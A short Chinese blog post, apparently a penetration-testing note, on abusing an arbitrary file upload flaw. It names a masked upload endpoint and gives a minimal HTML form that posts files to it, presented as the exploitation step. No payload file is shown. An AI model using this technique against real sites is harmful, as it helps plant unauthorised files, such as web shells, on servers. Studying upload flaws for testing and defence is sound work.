构造表单任意文件上传

1、找到一个上传文件的接口

https://XXX.XXXX.com/file/upload

2.1、漏洞利用-创建表单文件1.html

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Title</title>
</head>
<body>
<form action="https://***.*****.com/file/upload" method="post" enctype="multipart/form-data">
	<input type="file" name="file">
	<input type="submit">
</form>
</body>
</html>

2.2、访问1.html并上传文件

posted @ 2021-11-15 11:25  .醒醒  阅读(530)  评论(0编辑  收藏  举报